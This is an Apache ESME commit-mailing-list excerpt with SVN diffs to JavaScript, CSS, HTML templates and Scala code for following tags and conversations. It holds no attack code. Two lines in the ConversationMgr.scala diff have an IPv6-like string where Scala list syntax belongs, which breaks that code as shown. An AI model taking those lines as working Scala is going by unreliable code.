incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_action.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_action.js Sun Oct 10 12:36:21 2010 @@ -1,3 +1,22 @@ +/* + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +*/ + // <![CDATA[ /* * function to display action modal dialog Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_pool.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_pool.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_pool.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_pool.js Sun Oct 10 12:36:21 2010 @@ -1,3 +1,22 @@ +/* + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +*/ + // <![CDATA[ /* * function to display new_pool modal dialog Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_token.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_token.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_token.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_token.js Sun Oct 10 12:36:21 2010 @@ -1,3 +1,21 @@ +/* + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +*/ // <![CDATA[ /* * function to display token modal dialog Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_track.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_track.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_track.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_track.js Sun Oct 10 12:36:21 2010 @@ -1,3 +1,22 @@ +/* + Licensed to the Apache Software Foundation (ASF) under one * + or more contributor license agreements. See the NOTICE file * + distributed with this work for additional information * + regarding copyright ownership. The ASF licenses this file * + to you under the Apache License, Version 2.0 (the * + "License"); you may not use this file except in compliance * + with the License. You may obtain a copy of the License at * + * + http://www.apache.org/licenses/LICENSE-2.0 * + * + Unless required by applicable law or agreed to in writing, * + software distributed under the License is distributed on an * + "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * + KIND, either express or implied. See the License for the * + specific language governing permissions and limitations * + under the License. * +*/ + // <![CDATA[ /* * displayMessages called by lift:comet, type="Timeline" and type="PublicTimeline" Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages.js Sun Oct 10 12:36:21 2010 @@ -125,9 +125,15 @@ function displayMessages(msgArray, eleme if (cometResent) { resendButton.css("display", "none"); } else { - resendButton.attr('id', 'resend_' + id). + resendButton + .attr('id', 'resend_' + id) + .click(function() { resend_msg(id); + clearResend("resend_" + id ); + return false;}) + /* attr('onclick', 'javascript:resend_msg(' + id + ');' + 'clearResend("resend_' + id + '")'); + */ } @@ -136,7 +142,7 @@ function displayMessages(msgArray, eleme var conversation = newMsg.find('#conversation'); if (msgConversation != 0) { conversation.attr('href', - '/conversation/' + msgConversation); + '../conversation/' + msgConversation); } else { conversation.css("display", "none"); } Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages_top.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages_top.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages_top.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages_top.js Sun Oct 10 12:36:21 2010 @@ -62,6 +62,11 @@ function searchMe() { if(document.forms["validateForm"].term.value.trim.length > 0) document.forms["validateForm"].submit(); +} + +var resendFunction = function(id){ + resend_msg(id); + clearResend("resend_" + id ); } function displayMessages(msgArray, elementId) @@ -107,7 +112,7 @@ function displayMessages(msgArray, eleme var msgPool = ''; - if (cometMsg.pool) msgPool = 'in pool ' + cometMsg.pool.name; + if (cometMsg.pool) msgPool = 'in pool \'' + cometMsg.pool.name + "\'"; var msgPoolId = 0; if (cometMsg.pool) msgPoolId = cometMsg.pool.id; var msgSource = cometMsg.source; @@ -130,13 +135,17 @@ function displayMessages(msgArray, eleme // Put the marshalled data into a copy of the template var newMsg = msgTemplate.clone(true).attr('id',msgId); + newMsg.find('#author').text(msgAuthor.nickname); newMsg.find('#author').attr('href', "/user/" + msgAuthor.nickname ); - // Dealing with users with no avatars + // Dealing with users with no avatars if (!msgAuthor.imageUrl) { + if (top.location.pathName == "/") msgAuthor.imageUrl= "images/avatar.jpg" + else + msgAuthor.imageUrl= "../images/avatar.jpg" } @@ -145,25 +154,26 @@ function displayMessages(msgArray, eleme var avatar = newMsg.find('#avatar') .attr('src', msgAuthor.imageUrl) - .attr('alt',msgAuthor.firstname + ' ' + msgAuthor.lastname); + .attr('alt',msgAuthor.firstName + ' ' + msgAuthor.lastName); - newMsg.find('#body').html(msgBody); - newMsg.find('#supp_data').text(msgPool + " " + msgDateStr + " " + msgReason + " " + msgSource); - newMsg.find('#msgPool').text(msgPool); - //newMsg.find('#reason').text(msgReason); - //newMsg.find('#when').text(msgDateStr); + newMsg.find('#msgbody').html(msgBody); + if (msgReason) + newMsg.find('#supp_data').text(msgPool + " " + msgDateStr + " " + msgReason ); + else { + newMsg.find('#supp_data').text(msgPool + " " + msgDateStr + " via " + msgSource); + } var id = cometMsg.id; - var resendButton = newMsg.find('#resend'); + var resendButton = newMsg.find('#resend'); + if (cometResent) { resendButton.css("display", "none"); } else { - resendButton.attr('id', 'resend_' + id). - attr('onclick', 'javascript:resend_msg(' + id + ');' + - 'clearResend("resend_' + id + '")'); + resendButton + .attr('id', 'resend_' + id) + .attr('href', "javascript:resendFunction(" + id + ");") } - var tempStr = strip(msgBody).replaceAll ("'", "ZZZ$%$"); var myReplyMsg = tempStr.replaceAll ("ZZZ$%$", "\\'"); @@ -191,6 +201,7 @@ function displayMessages(msgArray, eleme // Insert the updated copy of the message into the page newMsg.prependTo(msgInsertPt).show(); + jQuery('#msgsep').clone().show(); } } } Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_single_message.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_single_message.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_single_message.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_single_message.js Sun Oct 10 12:36:21 2010 @@ -114,19 +114,26 @@ function displayMessages(msgArray, eleme .attr('alt',msgAuthor.firstname + ' ' + msgAuthor.lastname); - newMsg.find('#body').html(msgBody); - newMsg.find('#supp_data').text(msgPool + " " + msgDateStr + " " + msgReason + " " + msgSource); - //newMsg.find('#source').text(msgSource); - //newMsg.find('#reason').text(msgReason); - //newMsg.find('#when').text(msgDateStr); + newMsg.find('#msgbody').html(msgBody); + if (msgReason) + newMsg.find('#supp_data').text(msgPool + " " + msgDateStr + " " + msgReason ); + else { + newMsg.find('#supp_data').text(msgPool + " " + msgDateStr + " via " + msgSource); + } var id = cometMsg.id; var resendButton = newMsg.find('#resend'); if (cometResent) { resendButton.css("display", "none"); } else { - resendButton.attr('id', 'resend_' + id). + resendButton + .attr('id', 'resend_' + id) + .click(function() { resend_msg(id); + clearResend("resend_" + id ); + return false;}) + /* attr('onclick', 'javascript:resend_msg(' + id + ');' + 'clearResend("resend_' + id + '")'); + */ } newMsg.find('#reply').attr('href', "javascript:setReplyTo(" + id + ", '"+ msgBody + "', " + msgPoolId + ")"); Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/esme_streams.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/esme_streams.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/esme_streams.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/esme_streams.js Sun Oct 10 12:36:21 2010 @@ -7,13 +7,7 @@ "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * - http://www.apache.org/licenses/LICENSE-2.0 - - $("#prob_test").bind('DOMSubtreeModified', function() - { - alert ('hi'); - } -); * + http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/pretty.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/pretty.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/pretty.js (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/pretty.js Sun Oct 10 12:36:21 2010 @@ -10,9 +10,14 @@ function prettyDate(myDate){ var date = myDate, diff = (((new Date()).getTime() - date.getTime()) / 1000), day_diff = Math.floor(diff / 86400); + + - if ( isNaN(day_diff) || day_diff < 0 || day_diff >= 31 ) + if ( isNaN(day_diff) || day_diff < 0 ) return; + + if ( day_diff >= 31 ) + return "more than 1 month ago"; return day_diff == 0 && ( diff < 60 && "just now" || Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/style/style.css URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/style/style.css?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/style/style.css (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/style/style.css Sun Oct 10 12:36:21 2010 @@ -420,13 +420,14 @@ ul.main-links { .gray-box { float:left; background:#f9f9f9; - padding:20px; + } .updates-box { float:left; padding:10px 20px; word-wrap:break-word; + border:1px; } .avatar { float:left; @@ -434,7 +435,7 @@ ul.main-links { } .update { float:left; - width:420px; + width:470px; padding:0 10px; word-wrap:break-word; } @@ -443,6 +444,13 @@ ul.main-links { width:500px; padding:0 10px; } + + +.update2 { + float:left; + width:500px; + padding:0 10px; +} .tag, .tag a { margin:10px 0 2px; font-weight:normal; @@ -464,7 +472,7 @@ ul.main-links { margin:10px; width:90%; } -.time { +.supp_data_class { color:#07376d; font-size:80%; } @@ -560,6 +568,13 @@ ul#toc li.current a { margin-bottom:20px; } +.container-public { + float:left; + width: 623px; + margin-bottom:20px; + background: url(../images/bg-tabs.png) no-repeat; +} + .container-aux { float:left; width: 563px; @@ -665,3 +680,10 @@ top: 60px top: 100px } +/* Contacts +******************************************************************************/ + +.b-contacts { + list-style-type:none; +} + Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base.html Sun Oct 10 12:36:21 2010 @@ -47,7 +47,7 @@ <div id="container"> <div id="header"> <div id="logo"> - <h1><a href="/">ESME</a></h1> + <h1><a href="/"><lift:loc>ui_default_pagetitle</lift:loc></a></h1> </div> <div id="top-menu"> <ul> @@ -112,11 +112,11 @@ <input type="image" onclick="javascript:form.submit();" src="../images/btn-search.gif" style="padding:0;"/> </div> </div> - </form><!--search form--><h3><a href="" class ="tipelement" title="These are tags that appear often in your timeline."><lift:loc>ui_messages_message_label_tag_cloud</lift:loc></a></h3> + </form><!--search form--><h3 class ="tipelement" title="These are tags that appear often in your timeline."><lift:loc>ui_messages_message_label_tag_cloud</lift:loc></h3> <div class="right-content"> <lift:comet type="TagCloud"/> </div> - <h3><a href="" class ="tipelement" title="These are popular messages that users have resent often"><lift:loc>ui_messages_message_label_popular</lift:loc></a></h3> + <h3 class ="tipelement" title="These are popular messages that users have resent often"><lift:loc>ui_messages_message_label_popular</lift:loc></h3> <div class="right-content"> <lift:UserSnip.popular> <ul> @@ -128,7 +128,7 @@ </ul> </lift:UserSnip.popular> </div> - <h3><a href="" class ="tipelement" title="These are popular links that users have clicked often."><lift:loc>ui_messages_message_label_popular_links</lift:loc></a></h3> + <h3 class ="tipelement" title="These are popular links that users have clicked often."><lift:loc>ui_messages_message_label_popular_links</lift:loc></h3> <div class="right-content"> <lift:UserSnip.links> <ul> @@ -150,7 +150,7 @@ <div class="ftr-links"> <a href="http://cwiki.apache.org/confluence/display/ESME/Index"><lift:loc>custom_text_link1</lift:loc></a> | <a href="http://cwiki.apache.org/confluence/display/ESME/Index#Index-GettingStarted"><lift:loc>custom_text_link2</lift:loc></a> | - <a href="http://blog.esme.us/"><lift:loc>custom_text_link3</lift:loc></a> | + <a href="http://blog.esme.us/"><lift:loc>custom_text_link3</lift:loc></a> <br /> <lift:loc>ui_default_footer</lift:loc> <br /> Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base_top.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base_top.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base_top.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base_top.html Sun Oct 10 12:36:21 2010 @@ -1,3 +1,4 @@ + <!-- Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * @@ -47,7 +48,7 @@ <div id="container"> <div id="header"> <div id="logo"> - <h1><a href="/">ESME</a></h1> + <h1><a href="/"><lift:loc>ui_default_pagetitle</lift:loc></a></h1> </div> <div id="top-menu"> <ul> @@ -112,11 +113,11 @@ <input type="image" onclick="javascript:searchMe();" src="images/btn-search.gif" style="padding:0;"/> </div> </div> - </form><!--search form--><h3><a href="" class ="tipelement" title="These are tags that appear often in your timeline."><lift:loc>ui_messages_message_label_tag_cloud</lift:loc></a></h3> + </form><!--search form--><h3 class ="tipelement" title="These are tags that appear often in your timeline."><lift:loc>ui_messages_message_label_tag_cloud</lift:loc></h3> <div class="right-content"> <lift:comet type="TagCloud"/> </div> - <h3><a href="" class ="tipelement" title="These are popular messages that users have resent often"><lift:loc>ui_messages_message_label_popular</lift:loc></a></h3> + <h3 class ="tipelement" title="These are popular messages that users have resent often"><lift:loc>ui_messages_message_label_popular</lift:loc></h3> <div class="right-content"> <lift:UserSnip.popular> <ul> @@ -128,7 +129,7 @@ </ul> </lift:UserSnip.popular> </div> - <h3><a href="" class ="tipelement" title="These are popular links that users have clicked often."><lift:loc>ui_messages_message_label_popular_links</lift:loc></a></h3> + <h3 class ="tipelement" title="These are popular links that users have clicked often."><lift:loc>ui_messages_message_label_popular_links</lift:loc></h3> <div class="right-content"> <lift:UserSnip.links> <ul> @@ -150,7 +151,7 @@ <div class="ftr-links"> <a href="http://cwiki.apache.org/confluence/display/ESME/Index"><lift:loc>custom_text_link1</lift:loc></a> | <a href="http://cwiki.apache.org/confluence/display/ESME/Index#Index-GettingStarted"><lift:loc>custom_text_link2</lift:loc></a> | - <a href="http://blog.esme.us/"><lift:loc>custom_text_link3</lift:loc></a> | + <a href="http://blog.esme.us/"><lift:loc>custom_text_link3</lift:loc></a> <br /> <lift:loc>ui_default_footer</lift:loc> <br /> Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/default.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/default.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/default.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/default.html Sun Oct 10 12:36:21 2010 @@ -54,7 +54,7 @@ <div class="ftr-links"> <a href="http://cwiki.apache.org/confluence/display/ESME/Index"><lift:loc>custom_text_link1</lift:loc></a> | <a href="http://cwiki.apache.org/confluence/display/ESME/Index#Index-GettingStarted"><lift:loc>custom_text_link2</lift:loc></a> | - <a href="http://blog.esme.us/"><lift:loc>custom_text_link3</lift:loc></a> | + <a href="http://blog.esme.us/"><lift:loc>custom_text_link3</lift:loc></a> <br /> <lift:loc>ui_default_footer</lift:loc> <br /> From [email protected] Sun Oct 10 18:08:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87613 invoked from network); 10 Oct 2010 18:08:16 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Oct 2010 18:08:16 -0000 Received: (qmail 48927 invoked by uid 500); 10 Oct 2010 18:08:16 -0000 Delivered-To: [email protected] Received: (qmail 48893 invoked by uid 500); 10 Oct 2010 18:08:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48885 invoked by uid 99); 10 Oct 2010 18:08:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 10 Oct 2010 18:08:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED,T_FILL_THIS_FORM_SHORT X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 10 Oct 2010 18:08:11 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 08EAD23888D2; Sun, 10 Oct 2010 18:07:50 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1006328 - in /incubator/esme/trunk/server: ./ src/main/resources/props/ src/main/scala/bootstrap/liftweb/ src/main/scala/org/apache/esme/actor/ src/main/scala/org/apache/esme/lib/ src/main/scala/org/apache/esme/model/ src/main/scala/org/ap... Date: Sun, 10 Oct 2010 18:07:49 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: esjewett Date: Sun Oct 10 18:07:49 2010 New Revision: 1006328 URL: http://svn.apache.org/viewvc?rev=1006328&view=rev Log: Merge tagandconversationfollow branch into trunk Added: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/ConvDistributor.scala - copied unchanged from r1006324, incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/ConvDistributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/TagDistributor.scala - copied unchanged from r1006324, incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/TagDistributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/UserConvFollow.scala - copied unchanged from r1006324, incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/UserConvFollow.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/UserTagFollow.scala - copied unchanged from r1006324, incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/UserTagFollow.scala Modified: incubator/esme/trunk/server/ (props changed) incubator/esme/trunk/server/src/main/resources/props/compass.filesystem.cfg.xml (props changed) incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ProfileMgr.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Mailbox.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/MessageTag.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Tag.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/User.scala incubator/esme/trunk/server/src/main/scala/org/apache/esme/snippet/TagDisplay.scala incubator/esme/trunk/server/src/main/webapp/info_view/conversation.html incubator/esme/trunk/server/src/main/webapp/info_view/tag.html Propchange: incubator/esme/trunk/server/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Sun Oct 10 18:07:49 2010 @@ -1,3 +1,4 @@ /incubator/esme/branches/lift-2.0/server:928728-939625 /incubator/esme/branches/metadata:966215-979767 +/incubator/esme/branches/tagandconversationfollow:966215-1006324 /incubator/esme/branches/ui-2010-03-05:919339-923098 Propchange: incubator/esme/trunk/server/src/main/resources/props/compass.filesystem.cfg.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Sun Oct 10 18:07:49 2010 @@ -1 +1,2 @@ /incubator/esme/branches/metadata/src/main/resources/props/compass.filesystem.cfg.xml:966215-979767 +/incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.filesystem.cfg.xml:966215-1006324 Modified: incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala (original) +++ incubator/esme/trunk/server/src/main/scala/bootstrap/liftweb/Boot.scala Sun Oct 10 18:07:49 2010 @@ -83,7 +83,7 @@ class Boot { if (Props.mode == Props.RunModes.Test) { Schemifier.destroyTables_!!(Log.infoF _, User, ExtSession, - Message, Mailbox, Tag, + Message, Mailbox, Tag, UserTagFollow, UserConvFollow, Relationship, MessageTag, AuthToken, UrlStore, Tracking, Action, AccessPool, @@ -91,7 +91,7 @@ class Boot { } Schemifier.schemify(true, Log.infoF _, User, ExtSession, Message, - Mailbox, Tag, + Mailbox, Tag, UserTagFollow, UserConvFollow, Relationship, MessageTag, AuthToken, UrlStore, Tracking, Action, AccessPool, Privilege, UserAuth, UserCryptoSig) @@ -233,7 +233,9 @@ class Boot { // start Scala Actors used in ESME Distributor.touch SchedulerActor.touch - MessagePullActor.touch + MessagePullActor.touch + TagDistributor.touch + ConvDistributor.touch // ScalaInterpreter.touch Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/actor/Distributor.scala Sun Oct 10 18:07:49 2010 @@ -74,7 +74,9 @@ object Distributor extends LiftActor { case nm @ NewMessage(msg) => val toSend = UserActor.TestForTracking(msg) - users.values.foreach(_ ! toSend) + users.values.foreach(_ ! toSend) + TagDistributor ! nm + ConvDistributor ! nm listeners.foreach(_ ! nm) case UpdateTrackingFor(userId, ttype) => Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ConversationMgr.scala Sun Oct 10 18:07:49 2010 @@ -49,24 +49,59 @@ object ConversationMgr { val menuItems = Menu(Loc("conversation", List("info_view", "conversation"), S.?("base_conv_menu"), ifIsLoggedIn, - Loc.Snippet("displayConversation", displayConversation))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b - Nil - - def displayConversation(in: NodeSeq): NodeSeq = { - - val jsId = "timeline_messages" + Loc.Snippet("conv_info", convInfo))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b + Nil + + def convInfo(in: NodeSeq): NodeSeq = { val cid = S.param("cid").map(toLong).openOr(-1L) + val messages = Message.findMessages(List(cid)) + val user = User.currentUser - val msgs = Message.findAndPrime(By(Message.conversation, cid), - OrderBy(Message.id, Descending)) - - Script( - OnLoad(JsCrVar(jsId, JsArray( - msgs.map(m => JsObj(("message", m.asJs)) ) :_*)) & - JsFunc(" displayMessages", JsVar(jsId), jsId).cmd) - ) - - } - + def followOrUnfollow: NodeSeq = { + val ret: Box[NodeSeq] = for { + u <- user + m = messages.values.toList.first + } yield { + if (!m.followers.contains(u)) { + ajaxButton("Follow conversation", () => { + m.followers += u + m.save + updateFollow + }) + } else { + ajaxButton("Unfollow conversation", () => { + m.followers -= u + m.save + updateFollow + }) + } + } + + ret.open_! + } + + def displayConversation(in: NodeSeq): NodeSeq = { + + val jsId = "timeline_messages" + + val cid = S.param("cid").map(toLong).openOr(-1L) + + val msgs = Message.findAndPrime(By(Message.conversation, cid), + OrderBy(Message.id, Descending)) + + Script( + OnLoad(JsCrVar(jsId, JsArray( + msgs.map(m => JsObj(("message", m.asJs)) ) :_*)) & + JsFunc(" displayMessages", JsVar(jsId), jsId).cmd) + ) + + } + + def updateFollow: JsCmd = SetHtml("following", followOrUnfollow) + + bind("conv", in, + "followButton" -> followOrUnfollow, + "displayConversation" -> displayConversation _ ) + } } Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ProfileMgr.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ProfileMgr.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ProfileMgr.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/lib/ProfileMgr.scala Sun Oct 10 18:07:49 2010 @@ -140,7 +140,7 @@ object ProfileMgr { "password" -%> password(pwd, p => pwd = p.trim), "confirm" -%> password(pwd, p => checkEmailPassword(p.trim)), "openid" -%> text(openIdUrl, registerOpenID(_)), - "save" -%> submit("Save", user.save)) + "save" -%> submit("Save", user.save _)) }).getOrElse(NodeSeq.Empty) } Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Mailbox.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Mailbox.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Mailbox.scala (original) +++ incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Mailbox.scala Sun Oct 10 18:07:49 2010 @@ -102,6 +102,12 @@ case class DirectReason(fromUserId: Long } case class ConversationReason(conversationId: Long) extends MailboxReason { def attr = new UnprefixedAttribute("conversation", conversationId.toString, Null) +} +case class TagFollowReason(tagName: String) extends MailboxReason { + def attr = new UnprefixedAttribute("tag", tagName, Null) +} +case class ConvFollowReason(convId: Long) extends MailboxReason { + def attr = new UnprefixedAttribute("conversation", convId, Null) } case class LoginReason(userId: Long) extends MailboxReason { def attr = new UnprefixedAttribute("login", userId.toString, Null) Modified: incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala URL: http://svn.apache.org/viewvc/incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala?rev=1006328&r1=1006327&r2=1006328&view=diff ============================================================================== --- incubator/esme/trunk/server/src/main/scala/org/apache/esme/model/Message.scala (original) +++ 